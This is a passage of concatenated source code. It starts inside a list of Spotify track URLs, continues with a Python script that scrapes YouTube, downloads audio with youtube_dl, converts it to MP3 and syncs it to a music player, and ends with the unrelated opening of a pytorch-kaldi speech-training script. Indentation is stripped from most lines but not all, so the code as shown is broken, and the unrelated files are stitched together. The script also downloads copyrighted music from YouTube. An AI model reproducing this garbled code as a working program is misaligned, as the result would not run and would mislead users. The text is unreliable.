'https://open.spotify.com/track/3RkQ3UwOyPqpIiIvGVewuU?si=YmbfmNkuR5utTj38nBgLIw',
'https://open.spotify.com/track/6QPhpvO1pWDS91EsEmzsbc?si=wtBt_tsfTDOTBtpiyzkbRg',
'https://open.spotify.com/track/1v2zyAJrChw5JnfafSkwkJ?si=4HNy1dGMQ6mt8LbyyND6Ug',
'https://open.spotify.com/track/1baHxgYktT8eDdmtTozJF9?si=STqZcMIlRjGVuC_NHGvc9Q',
'https://open.spotify.com/track/4cjRiT6COzETZ3mWQXydnr?si=0ZBizUtGTEG0HRM00syTWA',
'https://open.spotify.com/track/0hWzB4dR1zwcokPvccww0k?si=bN-3XoMJSv-zln_8EJ1MaA&utm_source=whatsapp',
'https://open.spotify.com/track/5ql2mP9FUhB3SgMzv2akuO?si=tz41WoQuSlufJ4Vk0VJ5Cw&utm_source=whatsapp',
'https://open.spotify.com/track/4jM545c2DEKT78TYRSSzIr?si=vdprffAmQrCAT_hHI5haLw&utm_source=whatsapp',
'https://open.spotify.com/track/6YLcnMrPDdNSgvkie3yZ2U?si=NnPL0wNVStWW4p8rv98heA&utm_source=whatsapp',
'https://open.spotify.com/track/6t1FIJlZWTQfIZhsGjaulM?si=u6UqKpJoRBa2FsQ4Lkd6Ow&utm_source=whatsapp',
'https://open.spotify.com/track/26ky3sBMKv31Kpvil5pGDh?si=MaLI0y6nTIKARTZX6nXByg&utm_source=whatsapp',
'https://open.spotify.com/track/1CRy08G60mS5jvhB27xMpS?si=Z7hVhPYzSvqe5XM5xSGsMg&utm_source=whatsapp',
'https://open.spotify.com/track/5DRGuHS0xJ3X3OZjCrglTI?si=nTDdCh6XQCKVrt13lkhbfQ',
'https://open.spotify.com/track/6KkyuDhrEhR5nJVKtv9mCf?si=xoRTQum3TUS6kqS-PORuhg&utm_source=whatsapp',
'https://open.spotify.com/track/1v1oIWf2Xgh54kIWuKsDf6?si=rsA4CXIgStm7R0LJvpifAQ&utm_source=whatsapp',
'https://open.spotify.com/track/3Jai674s9zQJJxsgsyRBHz?si=_EgT5kMbSaONFCZcJ6bGxQ&utm_source=whatsapp',
'https://open.spotify.com/track/4U45aEWtQhrm8A5mxPaFZ7?si=3LBAosNsSDOgFw3ZzGkiqA',
'https://open.spotify.com/track/2L7eiwosmluifpAVmrvVtm?si=0DU_fV_jRUiOTgkvuKe3FA',
'https://open.spotify.com/track/2zQ2vKm9VslwOerYEWHtaF?si=cd4Rx19xRqu1wosBhzOZzQ',
'https://open.spotify.com/track/3qsMWrhTbsiTQVykS3AeO5?si=93ZT-DifQkiR_NzaF15SdA',
'https://open.spotify.com/track/74Dn2KLL8i6sAJoQh6hIRJ?si=AB9c5T-8QMChc810iOGo8w',
'https://open.spotify.com/track/2bZNwQvu1GQn0DvytrSwUx?si=42xc7Pe9TIGyLtZnRG2zkA',
'https://open.spotify.com/track/6Yn08sgGjRB2TARWyFqb70?si=UTWJqywoTR2g2ZTzCrimUw',
'https://open.spotify.com/track/5CBG9UwXBAZqKg97xzOUVN?si=iFCHEA_9Tsu2FL6tCSSmEQ&utm_source=whatsapp',
'https://open.spotify.com/track/3Jai674s9zQJJxsgsyRBHz?si=9uPkuNtdTLmGypMJG-EuBw&utm_source=whatsapp',
'https://open.spotify.com/track/5HjBpej4uHPAX8sMeUFJms?si=klSnlFH6Sbu-4HMqpfbAZA&utm_source=whatsapp',
'https://open.spotify.com/track/1cjYtL6yMFDLyZYn9bDkGo?si=0fWsUrDKRAqJpp5X47_XJQ&utm_source=whatsapp',
'https://open.spotify.com/track/16qYlQ6koFxYVbiJbGHblz?si=Tp0LZMOcSC-ocitQQlJxng&utm_source=whatsapp',
'https://open.spotify.com/track/3umugAkzQbdcOamNhjyIl7?si=P487XulRR6WyX5slgRQUmQ&utm_source=whatsapp',
'https://open.spotify.com/track/4o7Rszx7VVCzrCr1RPlPot?si=YyqV_GFzTEqN70NNwI3_pg&utm_source=whatsapp',
'https://open.spotify.com/track/59c7vs87nANrDrphf0gDBi?si=N1qNXBhcTyKo5iQUQK8w6Q&utm_source=whatsapp',
'https://open.spotify.com/track/0PvFJmanyNQMseIFrU708S?si=ni4FHwNXRLquvvMdVUkVGA&utm_source=whatsapp',
'https://open.spotify.com/track/7N3AWpme64LhM1P8I6yIZx?si=3Q-MtPrMQ2SdIN1GxR6rtQ&utm_source=whatsapp',
'https://open.spotify.com/track/3PDcJzbBq2rwBAwny82gJm?si=Vmw-Z9S3SpWSFxC_TqIIKA&utm_source=whatsapp',
'https://open.spotify.com/track/3m3TpmwZDF1UGC4v6Fwhfk?si=UT4TDL7iQsGdGVvQf1wiOQ&utm_source=whatsapp',
],
]
}
}
parser = argparse.ArgumentParser(description="🎷 Sync your Spotify music with your MP3 player!")
parser.add_argument("-s", help="process playlist, download, and sync with target drive", action='store_true')
parser.add_argument("-ds", help="sync downloaded files with your target drive only", action='store_true')
# parser.add_argument("-r", help="loop the process after 2 hrs", action='store_true')
parser.add_argument("-v", help="get more output?", action='store_true')
parser.add_argument("-d", help="Developer use only, for debug", action='store_true')
args = parser.parse_args()
client_credentials_manager = SpotifyClientCredentials(configs['spotify']['client_id'],
configs['spotify']['client_secret'])
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
def p(print_string):
"""
    Print a status line to stdout.
"""
print(print_string)
def search_youtube(text_to_search):
"""
    Search YouTube for the given text and return the parsed results
    (title, channel name, description, duration and video id).
    :rtype: list
"""
query = urllib.parse.quote(text_to_search)
url = "https://www.youtube.com/results?search_query=" + query
try:
response = urllib.request.urlopen(url)
html = response.read()
html = str(html, 'utf-8')
except Exception as e:
p('😥 Youtube gave up, this is so sad, can we get 1 like ' + repr(e))
return []
# find and get video id from html string.
start_string = 'var ytInitialData = '
end_string = ']};</script><script nonce='
start_position = html.find(start_string)
start_position += len(start_string)
end_position = html.find(end_string)
# get the youtube object
object_string = html[start_position: end_position + 3]
# trim the end and remove the last ; semi colon
my_fav_object = object_string.strip()[0:-1]
fav_object = json.loads(my_fav_object)
    # use a descriptive name instead of shadowing the builtin `list`
    result_items = \
        fav_object['contents']['twoColumnSearchResultsRenderer']['primaryContents']['sectionListRenderer'][
            'contents'][0]['itemSectionRenderer']['contents']
    video_list = []
    for item in result_items:
if 'videoRenderer' in item:
videoId = item['videoRenderer']['videoId']
title = item['videoRenderer']['title']['runs'][0]['text']
time = item['videoRenderer']['lengthText']['simpleText']
description = ''
if 'descriptionSnippet' in item['videoRenderer']:
description = item['videoRenderer']['descriptionSnippet']['runs'][0]['text']
channel_name = item['videoRenderer']['ownerText']['runs'][0]['text']
seconds = give_me_seconds(time)
# selected_video = {
# 'video_id': videoId,
# 'title': title,
# 'time': this_video_seconds,
# 'description': description,
# 'channel_name': channel_name
# }
video_list.append({
'title': title,
'channel': channel_name,
'description': description,
'href': '',
'video_id': videoId,
'duration': time,
'duration_seconds': seconds
})
# page = BeautifulSoup(html, features='lxml')
# vid_list = page.find_all('div', attrs={'class': 'yt-lockup-content'})
#
# for vid in vid_list:
#
# title_link = vid.findChild('a', attrs={'class': 'yt-uix-tile-link'}, recursive=True)
# if title_link is None:
# continue
#
# title = title_link.attrs['title']
# href = title_link.attrs['href']
#
# duration_el = vid.findChild('span', attrs={'class': 'accessible-description'}, recursive=True)
# if duration_el is None:
# continue
#
# duration = duration_el.text
#
# channel_name = ''
# channel_name_el = vid.findChild('a', attrs={'class': 'yt-uix-sessionlink'}, recursive=True)
# if channel_name_el is None:
# channel_name = channel_name_el.text
#
# video_description_el = vid.findChild('div', attrs={'class': 'yt-lockup-description'}, recursive=True)
# video_description = ''
# if video_description_el is not None:
# video_description = video_description_el.text
#
# if duration.find('Duration') == -1:
# continue
#
# duration_parsed = duration[duration.find(':') + 2:-1]
# # not parsing hour long stuff right now: example: 1:01:49
# # if the target video is more than 1 hr, consider it has 1 hr.
# if len(duration_parsed) > 5:
# duration_parsed = '59:59'
#
# duration_in_seconds = int(duration_parsed[int(duration_parsed.find(':')) + 1:])
# duration_in_minutes = int(duration_parsed[:duration_parsed.find(':')])
# total_duration_in_seconds = duration_in_seconds + (duration_in_minutes * 60)
# video_id = href[href.find('?v=') + 3:]
# video_list.append({
# 'title': title,
# 'channel': channel_name,
# 'description': video_description,
# 'href': href,
# 'video_id': video_id,
# 'duration': duration_parsed,
# 'duration_seconds': total_duration_in_seconds
# })
return video_list
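# A minimal sketch of one search_youtube() result entry (only the keys are taken from the
# dict built above; the values here are hypothetical):
#   {
#       'title': 'Artist - Song (Official Video)',
#       'channel': 'ArtistVEVO',
#       'description': 'Official video for ...',
#       'href': '',                     # kept empty by the current parser
#       'video_id': 'dQw4w9WgXcQ',
#       'duration': '3:33',
#       'duration_seconds': 213
#   }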
def give_me_seconds(time):
time_array = time.split(':')
time_array.reverse()
c = len(time_array) - 1
seconds = 0
while c >= 0:
sec = int(time_array[c])
c2 = c
while (c2):
sec *= 60
c2 -= 1
seconds += sec
c -= 1
return seconds
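# Worked examples for give_me_seconds(): each colon-separated field is multiplied by 60
# once per position from the right, so
#   give_me_seconds('4:23')    -> 4 * 60 + 23            = 263
#   give_me_seconds('1:01:49') -> 1 * 3600 + 1 * 60 + 49 = 3709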
def download_video(video_id, file_name):
"""
    Download the audio stream (format 251, webm/opus) for the given YouTube video id and store it as file_name.webm.
    :return: path to the downloaded .webm file
"""
ydl_opts = {
'format': '251/best',
'outtmpl': './' + file_name + '.webm',
}
if configs['youtube_username'] is not None:
ydl_opts['username'] = configs['youtube_username']
if configs['youtube_password'] is not None:
ydl_opts['password'] = configs['youtube_password']
a = youtube_dl.YoutubeDL(ydl_opts)
v = a.download(['https://www.youtube.com/watch?v=' + video_id])
return './' + file_name + '.webm'
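# Illustrative (commented-out) usage sketch; the video id and file name are hypothetical:
#   path = download_video('dQw4w9WgXcQ', 'artist-song')   # -> './artist-song.webm'
# youtube_dl is configured above to fetch audio-only format 251 and, when present in
# configs, to log in with youtube_username / youtube_password.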
def convert_to_mp3(source, target):
"""
    Convert the downloaded webm file to mp3 with the bundled Windows ffmpeg build (paths are converted to backslashes first).
    :return: None
"""
source = source.replace('/', '\\')
target = target.replace('/', '\\')
# fnull = open(os.devnull, 'w')
# subprocess.call('.\\ffmpeg\\bin\\ffmpeg.exe -threads 6 -i "' + source + '" -vn -ab 128k -ar 44100 -y "' + target + '"', shell=True, stdout=fnull, stderr=subprocess.STDOUT)
os.system(
'".\\ffmpeg\\bin\\ffmpeg.exe -hide_banner -i "' + source + '" -vn -ab 160k -ar 44100 -y "' + target + '""')
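# With hypothetical paths source='./artist-song.webm' and target='D:/music/artist-song.mp3',
# the command passed to cmd.exe ends up as (the extra outer quotes are a cmd.exe quirk that
# lets the quoted exe path and the quoted arguments coexist):
#   ".\ffmpeg\bin\ffmpeg.exe -hide_banner -i ".\artist-song.webm" -vn -ab 160k -ar 44100 -y "D:\music\artist-song.mp3""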
def tag_mp3(file_path, track):
"""
    Tag the mp3: set artist, album, title, track number, a comment with the search info, and the album art.
    :return: None
"""
f = eyed3.load(file_path)
if f.tag is None:
f.initTag()
if track['album_art'] is not None:
content = requests.get(track['album_art']).content
f.tag.images.set(3, content, 'image/jpeg')
f.tag.comments.set(track['search_term'] + ' = ' + track['selected_result'])
f.tag.artist = track['artist']
f.tag.album = track['album']
f.tag.album_artist = track['artist']
f.tag.title = track['name']
f.tag.track_num = track['number']
f.tag.save(None, (2, 3, 0))
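# Sketch of the track dict fields tag_mp3() consumes (the keys are real, the values hypothetical):
#   {
#       'name': 'Song', 'artist': 'Artist', 'album': 'Album', 'number': 3,
#       'album_art': 'https://i.scdn.co/image/...',   # may be None
#       'search_term': '"artist" "song" ...',
#       'selected_result': '<video_id> <title> I:<result index> D:<duration diff>'
#   }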
def clean_string(filename):
"""
    Clean the string: keep only ASCII letters, digits, spaces and '-', then lowercase and strip it.
    :param filename: raw string to sanitise
    :return: cleaned, lowercased string safe for use as a file name
"""
whitelist = set('abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-')
filename = ''.join(filter(whitelist.__contains__, filename))
filename = filename.lower().strip()
return filename
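# Worked example: clean_string('Daft Punk - Get Lucky (feat. Pharrell)')
#   -> 'daft punk - get lucky feat pharrell'
# (parentheses and dots are dropped because only letters, digits, spaces and '-' are whitelisted)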
get_spotify_playlist_threads = 0
get_spotify_playlist_result = []  # accumulator filled by get_spotify_playlist(); renamed so it does not clash with the function
def get_spotify_playlist(spotify_playlist):
    global get_spotify_playlist_result
global get_spotify_playlist_threads
    get_spotify_playlist_result = []
for playlist_info in spotify_playlist:
def get_playlist(playlist_info2):
global get_spotify_playlist_threads
            global get_spotify_playlist_result
if 'user' not in playlist_info2:
playlist_single_info = {
'name': 'songs',
'path': 'songs/',
'tracks': playlist_info2['song_ids'],
'playlist_id': False,
'type': 'spotify',
'user_id': False,
'user_name': False
}
else:
try:
info = sp.user_playlist(playlist_info2['user'], playlist_info2['playlist_id']);
except:
p("\n Failed to get playlist " + playlist_info2['playlist_id'])
os._exit(1)
owner_name = info['owner']['display_name']
p('Fetching playlist information for ✔ id:' + owner_name + ' playlist: ' + info['name'])
path = clean_string(owner_name[:6] + '-' + info['name'])
playlist_single_info = {
'name': info['name'],
'path': path + '/',
'tracks': [],
'playlist_id': info['id'],
'type': 'spotify',
'user_id': info['owner']['id'],
'user_name': info['owner']['display_name']
}
            get_spotify_playlist_result.append(playlist_single_info)
get_spotify_playlist_threads -= 1
while get_spotify_playlist_threads > configs['concurrent_connections']:
time.sleep(.1)
get_playlist(playlist_info)
get_spotify_playlist_threads += 1
# t = threading.Thread(target=get_playlist, args=(playlist_info,))
# t.daemon = True
# t.start()
while get_spotify_playlist_threads != 0:
time.sleep(.1)
    return get_spotify_playlist_result
def get_spotify_tracks_individualy(tracks2):
trackIds = []
trackGroups = []
tracks = {'tracks': []}
limit = 10
p('')
for t in tracks2:
parts = t.split('?')[0].split('/')
id = parts[len(parts) - 1]
trackIds.append(id)
        if len(trackIds) == limit:
            trackGroups.append(trackIds)
            trackIds = []
    # keep any leftover ids that did not fill a complete group
    if len(trackIds) > 0:
        trackGroups.append(trackIds)
    p('Made ' + str(len(trackGroups)) + ' track groups from tracks')
for g in trackGroups:
p('getting tracks for group')
t3 = sp.tracks(g)['tracks']
tracks['tracks'] = tracks['tracks'] + t3
parsed_tracks = []
for t in tracks['tracks']:
if t is None or 'name' not in t:
continue
track_name = t['name']
artist_name = t['artists'][0]['name']
album_name = t['album']['name']
path = clean_string(artist_name + '-' + track_name)
def compose_term(term, lim):
composed_terms = []
index = 0
for t in term.split(' '):
if len(t) > 1:
if index <= lim:
composed_terms.append('"' + t + '"') # make strict search for first 5 words
index += 1
else:
composed_terms.append('' + t + '') # not so strict search for later words
return ' '.join(composed_terms)
composed_term = compose_term(clean_string(artist_name), 2) + ' ' + compose_term(clean_string(track_name), 4)
search_term = composed_term + ' ' + configs['song_selection']['append_search_term']
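        # Example of how the search term is composed (the config value is hypothetical):
        #   compose_term(clean_string('Daft Punk'), 2)  -> '"daft" "punk"'
        #   compose_term(clean_string('Get Lucky'), 4)  -> '"get" "lucky"'
        # with append_search_term = 'audio' the final search_term becomes
        #   '"daft" "punk" "get" "lucky" audio'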
track = {
'name': track_name,
'search_term': search_term,
'artist': artist_name,
'album': album_name,
'path': path + '.mp3',
'number': t['track_number'],
'id': t['id'],
'duration': int(t['duration_ms']) / 1000,
'disc_number': str(t['disc_number']),
'artist_id': t['artists'][0]['id'],
'release_date': t['album']['release_date'],
}
images = t['album']['images']
if len(images) > 1:
image = t['album']['images'][1]['url']
elif len(images) == 1:
image = t['album']['images'][0]['url']
else:
image = None
track['album_art'] = image
parsed_tracks.append(track)
return parsed_tracks
# sp.tracks()
def get_spotify_tracks(user_id, playlist_id):
"""
    Fetch the first 100 tracks of a user's playlist from Spotify and parse them into the internal track dicts.
    :param user_id: Spotify user id that owns the playlist
    :param playlist_id: Spotify playlist id
    :return: list of parsed track dicts
"""
# @todo implement tracks gathering for more than 100 tracks, pagination pending
tracks = sp.user_playlist_tracks(user_id, playlist_id, None, 100, 0)
parsed_tracks = []
for t in tracks['items']:
track_name = t['track']['name']
artist_name = t['track']['artists'][0]['name']
album_name = t['track']['album']['name']
path = clean_string(artist_name + '-' + track_name)
def compose_term(term, lim):
composed_terms = []
index = 0
for t in term.split(' '):
if len(t) > 1:
if index <= lim:
composed_terms.append('"' + t + '"') # make strict search for first 5 words
index += 1
else:
composed_terms.append('' + t + '') # not so strict search for later words
return ' '.join(composed_terms)
composed_term = compose_term(clean_string(artist_name), 2) + ' ' + compose_term(clean_string(track_name), 4)
search_term = composed_term + ' ' + configs['song_selection']['append_search_term']
track = {
'name': track_name,
'search_term': search_term,
'artist': artist_name,
'album': album_name,
'path': path + '.mp3',
'number': t['track']['track_number'],
'id': t['track']['id'],
'duration': int(t['track']['duration_ms']) / 1000,
'disc_number': str(t['track']['disc_number']),
'artist_id': t['track']['artists'][0]['id'],
'release_date': t['track']['album']['release_date'],
}
images = t['track']['album']['images']
if len(images) > 1:
image = t['track']['album']['images'][1]['url']
elif len(images) == 1:
image = t['track']['album']['images'][0]['url']
else:
image = None
track['album_art'] = image
parsed_tracks.append(track)
return parsed_tracks
def parse_spotify_playlist_config():
playlist = configs['playlist']['spotify']
for pl in playlist:
if not isinstance(pl, str):
            # pl is already a plain list of song urls; the ids are extracted later by get_spotify_tracks_individualy
configs['playlist']['spotify_parsed'].append({
'type': 'songs_list',
'song_ids': pl,
})
else:
user = pl[pl.find('user:') + 5:pl.find('playlist:') - 1]
pl_id = pl[pl.find('playlist:') + 9:]
configs['playlist']['spotify_parsed'].append({
'user': user,
'playlist_id': pl_id,
'type': 'playlist',
})
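# Example of the string form this parser expects (the playlist id is a placeholder):
#   'spotify:user:spotify:playlist:37i9dQZF1DXxxxxxxxxxxx'
#   -> {'user': 'spotify', 'playlist_id': '37i9dQZF1DXxxxxxxxxxxx', 'type': 'playlist'}
# Non-string entries are assumed to already be plain lists of track urls (see the song url
# list above) and are stored untouched as type 'songs_list'.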
def process_diff_files(diff, source, dest):
files_to_remove = diff['files_to_remove']
files_to_add = diff['files_to_add']
for r in files_to_remove:
d = dest + r
try:
os.remove(d)
p('Removed file: ' + d)
dirs = d[:d.rfind('/')]
remove_dir_if_empty(dirs)
except:
p("Hmm could not remove the file or dir")
t = len(files_to_add)
for f in files_to_add:
d = dest + f
dirs = d[:d.rfind('/')]
if not os.path.exists(dirs + '/'):
p('Creating folder ' + dirs)
os.makedirs(dirs)
if not os.path.exists(dest + f):
if not os.path.exists(source + f):
                p('The source file ' + f + ' does not exist')
else:
p('Copying file ' + str(t) + '/' + str(len(files_to_add)) + ' - ' + dest + f)
shutil.copyfile(source + f, dest + f)
else:
p('Already exists ' + str(t) + '/' + str(len(files_to_add)) + ' - ' + dest + f)
t -= 1
p('Files are in sync!')
def remove_dir_if_empty(a):
files = os.listdir(a)
if len(files) == 0:
        p("Removing folder because it's empty: " + a)
os.removedirs(a)
def diff_files(files_dir, compare_dir, files=None):
dirs = os.listdir(compare_dir)
if files is None:
files = []
f_dirs = os.listdir(files_dir)
for d in f_dirs:
f_files = os.listdir(files_dir + d)
for f2 in f_files:
files.append(d + '/' + f2)
files_to_remove = []
files_to_add = []
for l in dirs:
folder = l + '/'
disk_files = os.listdir(compare_dir + folder)
for df in disk_files:
file = folder + df
found = False
for f in files:
if file == f:
found = True
break
if not found:
files_to_remove.append(file)
for f in files:
exists = os.path.exists(compare_dir + f)
if not exists:
files_to_add.append(f)
o = {
'files_to_remove': files_to_remove,
'files_to_add': files_to_add,
}
# print(o)
return o
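# Minimal sketch of what diff_files() returns, for hypothetical directory contents:
#   download dir:  'artist-album/track1.mp3', 'artist-album/track2.mp3'
#   target drive:  'artist-album/track1.mp3', 'old-stuff/gone.mp3'
#   -> {'files_to_remove': ['old-stuff/gone.mp3'], 'files_to_add': ['artist-album/track2.mp3']}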
running_threads = 0
total_playlist_cd = 0
total_playlist = 0
total_tracks_cd = 0
total_tracks = 0
def p2(s):
p('pl:' + str(total_playlist_cd) + '/' + str(total_playlist) + '-tracks:' + str(total_tracks_cd) + '/' + str(
total_tracks) + ' - ' + s)
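# p2() prefixes every message with the remaining/total playlist and track counters, e.g.
# (hypothetical counts): 'pl:2/5-tracks:37/120 - 3T | My Mix | Some Song: downloading audio'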
def clean_temp():
p('Cleaning temp')
files = os.listdir('./')
for f in files:
if f.find('.webm') > -1:
p('Removing temp file: ' + f)
os.remove('./' + f)
process_playlist_threads = 0
parsed_playlist = []
hr = '───────────────────'
def process_playlist():
p('Starting sync')
parse_spotify_playlist_config()
p('Download dir: ' + configs['download_dir'])
if not os.path.exists(configs['download_dir']):
        p('The download directory does not exist')
exit(1)
clean_temp()
p('Getting playlists')
playlist = get_spotify_playlist(configs['playlist']['spotify_parsed'])
global total_playlist
global total_playlist_cd
global total_tracks
global total_tracks_cd
global parsed_playlist
songs_not_found_list = []
parsed_playlist = []
total_playlist = len(playlist)
total_playlist_cd = total_playlist
total_tracks = 0
total_tracks_cd = 0
p(hr)
p('Found ' + str(total_playlist) + ' playlists')
global process_playlist_threads
process_playlist_threads = 0
for pl in playlist:
def get_playlist(pl2):
global process_playlist_threads
global total_tracks
global parsed_playlist
            if pl2['user_id'] is False:
tracks = get_spotify_tracks_individualy(pl2['tracks'])
else:
tracks = get_spotify_tracks(pl2['user_id'], pl2['playlist_id'])
total_tracks += len(tracks)
p('Got ' + str(len(tracks)) + ' tracks from ' + pl2['name'])
pl2['tracks'] = tracks
parsed_playlist.append(pl2)
process_playlist_threads -= 1
while process_playlist_threads > configs['concurrent_connections']:
time.sleep(0.5)
get_playlist(pl)
process_playlist_threads += 1
# t = threading.Thread(target=get_playlist, args=(pl,))
# t.daemon = True
# t.start()
while process_playlist_threads != 0:
time.sleep(0.5)
p('Playlist scan complete, found ' + str(total_tracks) + ' total tracks')
p(hr)
total_tracks_cd = total_tracks
diff_file_paths = []
p2('Starting..')
for pl in parsed_playlist:
folder_path = configs['download_dir'] + pl['path']
for track_index, track in enumerate(pl['tracks']):
def process_track(pl, folder_path, track, track_index):
global running_threads
global total_tracks_cd
running_threads += 1
pre_text = pl['name'][:10] + ' | ' + track['name']
p(hr + ' ' + pre_text)
p2(str(running_threads) + 'T | ' + pre_text)
diff_file_paths.append(pl['path'] + track['path'])
file_path = folder_path + track['path']
p2(str(running_threads) + 'T | ' + pre_text + ': output to: ' + file_path)
if os.path.exists(file_path):
p2(str(running_threads) + 'T | ' + pre_text + ': file already exists, skipping')
total_tracks_cd = total_tracks_cd - 1
running_threads -= 1
sys.exit()
search_term = track['search_term']
p2(str(running_threads) + 'T | ' + pre_text + ': searching yt for ' + search_term)
all_results = search_youtube(search_term)
p2(str(running_threads) + 'T | ' + pre_text + ': got ' + str(len(all_results)) + ' results')
                # filter out unrelated results: selecting purely by duration diff can pick the
                # wrong track, because unrelated songs sometimes have almost identical durations.
terms = clean_string(track['artist'] + ' ' + track['name'])
terms_list = terms.split(' ')
required_matched_terms = []
for t in terms_list:
if len(t) > 1:
required_matched_terms.append(t)
results = []
required_matches = len(required_matched_terms)
for r in all_results:
matches = 0
search_in = r['title'] + ' ' + r['channel'] + ' ' + r['description']
edge_case_search_in = r['title'] + ' ' + r['channel']
edge_case_search_in2 = clean_string(edge_case_search_in).lower()
unrelated = False
r2 = clean_string(search_in).lower()
for t in terms_list:
t2 = clean_string(t).lower()
if len(t) > 1 and r2.find(t2) != -1:
matches += 1
if required_matches < 4 and matches != required_matches:
unrelated = True
elif required_matches >= 4:
                        # for long names (4+ significant words) only a percentage of the words has to
                        # match, controlled by song_selection.min_percent_threshold (e.g. a 60%
                        # threshold with 6 words means round(0.6 * 6) = 4 matches are required)
required_words_to_matches = configs['song_selection'][
'min_percent_threshold'] * required_matches / 100
if matches < round(required_words_to_matches):
unrelated = True
# match_percent = matches * 100 / required_matches
# if match_percent < configs['song_selection']['min_percent_threshold']: # matches less than 60 percent will disqualify
# detect edge cases here live, instrumental etc
edge_cases = configs['song_selection']['edge_cases']
for e in edge_cases:
if edge_case_search_in2.find(e.lower()) != -1 and terms.find(e.lower()) == -1:
unrelated = True
break
if not configs['song_selection']['use_filtering']:
unrelated = False
if not unrelated:
results.append(r)
                # among the first few candidates, pick the one whose duration is closest to the Spotify track
def select_result(re):
lowest_index = 0
lowest_diff = 1000
for index, r in enumerate(re):
diff = abs(int(r['duration_seconds']) - int(track['duration']))
if diff < lowest_diff and index < configs['song_selection']['diff_track_seconds_limit']:
lowest_diff = diff
lowest_index = index
p2(str(running_threads) + 'T | ' + pre_text + ': length diff = ' + str(lowest_diff) + ' seconds')
p2(str(running_threads) + 'T | ' + pre_text + ': selecting = "' + re[lowest_index]['title'] + '"')
return [lowest_index, lowest_diff]
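                # Worked example: with candidate durations [214, 260, 212] s and a Spotify
                # duration of 215 s the diffs are [1, 45, 3], so index 0 (diff 1 s) is selected,
                # provided diff_track_seconds_limit allows that index (note the limit caps the
                # candidate *index*, not the duration difference).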
if len(results) == 0:
p2(str(running_threads) + 'T | ' + pre_text + ': results were not found')
songs_not_found_list.append(pre_text + ', term used: ' + track['search_term'])
total_tracks_cd = total_tracks_cd - 1
running_threads -= 1
sys.exit()
sr = select_result(results)
result_index = sr[0]
result_diff = sr[1]
selected_result = results[result_index]
try:
p2(str(running_threads) + 'T | ' + pre_text + ': downloading audio')
video_path = download_video(selected_result['video_id'], track['path'])
except:
# one more try.
p2(str(running_threads) + 'T | ' + pre_text + ':failed to download, one more try?')
results.pop(result_index)
sr = select_result(results)
result_index = sr[0]
result_diff = sr[1]
selected_result = results[result_index]
p(str(running_threads) + 'T | ' + pre_text + ':could not download video, selecting different one')
try:
video_path = download_video(selected_result['video_id'], track['path'])
except:
p2(str(running_threads) + 'T | ' + pre_text + ':failed to download the song again, giving up!')
running_threads -= 1
sys.exit()
# this was the selected result
track['selected_result'] = selected_result['video_id'] + ' ' + selected_result['title'] + ' I:' + str(
result_index) + ' D:' + str(result_diff)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
# def in_thread():
p2(str(running_threads) + 'T | ' + pre_text + ': converting to mp3')
convert_to_mp3(video_path, file_path)
time.sleep(.1)
os.remove(video_path)
if configs['tag_mp3']:
p2(str(running_threads) + 'T | ' + pre_text + ': downloading album art')
p2(str(running_threads) + 'T | ' + pre_text + ': adding meta-data to mp3')
tag_mp3(file_path, track)
p2(str(running_threads) + 'T | ' + pre_text + ': saved to ' + file_path)
total_tracks_cd = total_tracks_cd - 1
running_threads -= 1
while running_threads > configs['threads'] - 1:
time.sleep(.01)
# time.sleep(random.uniform(0, 1))
# process_track(pl, folder_path, track, track_index)
t = threading.Thread(target=process_track, args=(pl, folder_path, track, track_index))
t.daemon = True
t.start()
total_playlist_cd -= 1
p('Waiting for threads to finish :' + str(running_threads))
while running_threads != 0:
print('... Running threads: ' + str(running_threads))
time.sleep(2)
p('Checking for removed files')
diffed_files = diff_files(configs['download_dir'], configs['download_dir'], files=diff_file_paths)
if len(diffed_files['files_to_remove']):
p('Removing files')
process_diff_files(diffed_files, configs['download_dir'], configs['download_dir'])
sync_drive()
p('Songs not found: ' + str(len(songs_not_found_list)))
for s in songs_not_found_list:
p('not found: ' + s)
p('Completed')
def sync_drive():
"""
    Sync the download directory with each configured target drive (copy new files, remove deleted ones).
    :return: None
"""
for drive in configs['sync_download_dir']:
if os.path.exists(drive):
p('Syncing files with ' + drive)
drive_diff_files = diff_files(configs['download_dir'], drive)
process_diff_files(drive_diff_files, configs['download_dir'], drive)
else:
            p('The path ' + drive + ' does not exist at the moment, skipping')
if args.d:
print('ok')
if args.s:
process_playlist()
if args.ds:
sync_drive()
|
run_exp.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
from __future__ import print_function
import os
import sys
import glob
import configparser
import numpy as np
from utils import check_cfg,create_lists,create_configs, compute_avg_performance, \
read_args_command_line, run_shell,compute_n_chunks, get_all_archs,cfg_item2sec, \
dump_epoch_results, create_curves,change_lr_cfg,expand_str_ep, do_validation_after_chunk, \
get_val_info_file_path, get_val_cfg_file_path, get_chunks_after_which_to_validate
from data_io import read_lab_fea_refac01 as read_lab_fea
from shutil import copyfile
from core import read_next_chunk_into_shared_list_with_subprocess, extract_data_from_shared_list, convert_numpy_to_torch
import re
from distutils.util import strtobool
import importlib
import math
import multiprocessing
def _run_forwarding_in_subprocesses(config):
use_cuda=strtobool(config['exp']['use_cuda'])
if use_cuda:
return False
else:
return True
def _is_first_validation(ck, N_ck_tr, config):
def _get_nr_of_valid_per_epoch_from_config(config):
        if 'nr_of_valid_per_epoch' not in config['exp']:
return 1
return int(config['exp']['nr_of_valid_per_epoch'])
val_chunks = get_chunks_after_which_to_validate(N_ck_tr, _get_nr_of_valid_per_epoch_from_config(config))
if ck == val_chunks[0]:
return True
return False
def _max_nr_of_parallel_forwarding_processes(config):
if 'max_nr_of_parallel_forwarding_processes' in config['forward']:
return int(config['forward']['max_nr_of_parallel_forwarding_processes'])
return -1
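# Illustrative cfg snippet (values are hypothetical) showing the options read by the helpers
# above; only the key names are taken from the code:
#   [exp]
#   use_cuda = False
#   nr_of_valid_per_epoch = 2
#   [forward]
#   max_nr_of_parallel_forwarding_processes = 4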
# Reading global cfg file (first argument, mandatory)
cfg_file=sys.argv[1]
if not(os.path.exists(cfg_file)):
sys.stderr.write('ERROR: The config file %s does not exist!\n'%(cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Reading and parsing optional arguments from command line (e.g.,--optimization,lr=0.002)
[section_args,field_args,value_args]=read_args_command_line(sys.argv,config)
# Output folder creation
out_folder=config['exp']['out_folder']
